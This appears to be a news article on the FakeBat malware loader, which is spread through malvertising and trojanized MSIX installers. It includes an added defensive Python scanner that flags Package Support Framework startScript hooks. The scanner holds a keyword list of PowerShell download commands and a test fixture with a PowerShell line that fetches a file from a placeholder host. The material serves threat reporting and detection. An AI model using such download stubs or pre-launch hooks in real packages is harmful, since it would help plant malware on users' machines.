FakeBat Malware Exploits Software Searches

Lilu Anderson

Understanding the Rise of FakeBat Malware

Mandiant's Managed Defense team has reported a marked rise in infections traced to malvertising campaigns that deliver a loader called FakeBat. The campaigns target people searching for popular business software: the search leads to a trojanized MSIX installer which, before the application it imitates ever starts, runs a PowerShell script that downloads the next-stage payload.

Linking FakeBat to Eugenfest

FakeBat is also recognized by other names, such as EugenLoader and PaykLoader, and has connections to a threat group known as Eugenfest. Google's threat intelligence team identifies this malware under the codename NUMOZYLOD, attributing the Malware-as-a-Service operation to UNC4536.

The Mechanics of the Attack

The attack relies on drive-by download techniques: users searching for popular software are redirected to look-alike websites offering malware-laden MSIX installers. Families delivered through FakeBat include IcedID, RedLine Stealer, Lumma Stealer, SectopRAT (aka ArechClient2), and Carbanak, the last of which is associated with the FIN7 cybercrime group.

Deceptive Tactics and Exploitation

UNC4536 uses malvertising to spread trojanized MSIX installers that impersonate well-known software such as Brave, KeePass, Notion, Steam, and Zoom. The installers are hosted on websites posing as legitimate download sources, which persuades users to fetch and run them. What sets these attacks apart is the use of the startScript configuration in the MSIX package (the Package Support Framework's config.json) to execute a script before the main application is launched, so the victim sees the expected program start while the loader has already run.
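Checking a package for this hook, as an added example that is not part of the original article and not Mandiant's or Google's tooling: the script below treats an .msix file as the ZIP archive it is, reads the Package Support Framework config.json at the package root, and reports every application entry that declares a startScript, together with whether the referenced script body contains common PowerShell download primitives. The package it builds to run against is constructed (the Contoso.Notes identity, the StartInstall.ps1 name and the example.invalid host are placeholders, not indicators from the campaign), and the config.json field names (applications, executable, startScript, scriptPath, runOnce, waitForScriptToFinish) follow the PSF schema as assumed here.

```python
"""Flag Package Support Framework startScript hooks inside MSIX packages.

Added example for this article; not the tooling of Mandiant, Google or the
PSF project. An MSIX package is a ZIP archive, and PSF reads its settings
from a config.json at the package root (schema as assumed here).
"""
import io
import json
import zipfile

# PSF keeps its configuration at the package root under this name.
PSF_CONFIG = "config.json"

# Cmdlets and .NET calls a pre-launch script would need to fetch a second
# stage. Their presence is a signal to triage, not proof of malice.
DOWNLOAD_HINTS = (
    "invoke-webrequest", "iwr ", "invoke-restmethod", "irm ",
    "downloadstring", "downloadfile", "net.webclient",
    "start-bitstransfer", "invoke-expression", "iex ",
)


def psf_start_scripts(package_bytes: bytes) -> list[dict]:
    """Return one finding per PSF application entry that declares a startScript.

    Each finding records the executable the script fronts, the script path,
    the runOnce / waitForScriptToFinish values exactly as written in
    config.json (None when the key is absent), whether the script file is
    actually shipped in the package, and whether its body contains a
    download hint.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as pkg:
        # Match entry names case-insensitively; MSIX preserves case but the
        # Windows file system does not distinguish it.
        names = {n.lower(): n for n in pkg.namelist()}
        if PSF_CONFIG not in names:
            return findings  # no PSF config, so no startScript hook
        config = json.loads(pkg.read(names[PSF_CONFIG]))
        for app in config.get("applications", []):
            script = app.get("startScript")
            if not script:
                continue
            path = str(script.get("scriptPath", ""))
            member = names.get(path.replace("\\", "/").lower())
            body = pkg.read(member).decode("utf-8", "replace") if member else ""
            lowered = body.lower()
            findings.append({
                "app_id": app.get("id"),
                "executable": app.get("executable"),
                "script_path": path,
                "script_present": member is not None,
                "run_once": script.get("runOnce"),
                "wait_for_script": script.get("waitForScriptToFinish"),
                "downloader": any(h in lowered for h in DOWNLOAD_HINTS),
            })
    return findings


def build_sample_package(with_psf: bool = True) -> bytes:
    """Constructed test package; not a real FakeBat sample.

    A minimal AppxManifest plus, when with_psf is set, a PSF config.json
    whose startScript points at a PowerShell stub that fetches a file from
    a placeholder host (example.invalid is reserved and resolves nowhere).
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr(
            "AppxManifest.xml",
            '<?xml version="1.0" encoding="utf-8"?>'
            '<Package><Identity Name="Contoso.Notes" '
            'Publisher="CN=Contoso" Version="1.0.0.0"/></Package>',
        )
        pkg.writestr("VFS/ProgramFilesX64/Notes/Notes.exe", b"MZ")
        if with_psf:
            pkg.writestr(PSF_CONFIG, json.dumps({
                "applications": [{
                    "id": "Notes",
                    "executable": "VFS/ProgramFilesX64/Notes/Notes.exe",
                    "startScript": {
                        "scriptPath": "StartInstall.ps1",
                        "runOnce": True,
                        "showWindow": False,
                        "waitForScriptToFinish": True,
                    },
                }],
            }))
            pkg.writestr(
                "StartInstall.ps1",
                "# constructed stand-in for a pre-launch stage-2 fetch\n"
                "Invoke-WebRequest -Uri 'https://example.invalid/s' "
                "-OutFile \"$env:TEMP\\s.bin\"\n",
            )
    return buf.getvalue()


if __name__ == "__main__":
    for finding in psf_start_scripts(build_sample_package()):
        print(finding)
    print("clean package:", psf_start_scripts(build_sample_package(with_psf=False)))
```

To run it against a downloaded installer, read the .msix (or .appx / .msixbundle member) into bytes and pass it to psf_start_scripts. A startScript entry is legitimate in some enterprise repackaging, so the useful question is whether the vendor's genuine package carries one at all, and what the script does.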

The Role of NUMOZYLOD

Acting as a distributor, UNC4536 uses FakeBat to deploy follow-on payloads on behalf of partners such as FIN7. NUMOZYLOD's own role is reconnaissance and staging: it collects system details, including operating system information, whether the host is domain-joined, and the installed antivirus products. It may also record the host's public IPv4 and IPv6 addresses and transmits the collected data to its command-and-control (C2) servers. For persistence it creates a shortcut (.lnk) in the StartUp folder, so the loader is relaunched at each logon.

Recent Developments in Malware Activity

The disclosure follows Mandiant's earlier report on another downloader, EMPTYSPACE (also known as BrokerLoader or Vetta Loader), used by the financially motivated group UNC4990 for data theft and cryptojacking against targets in Italy.
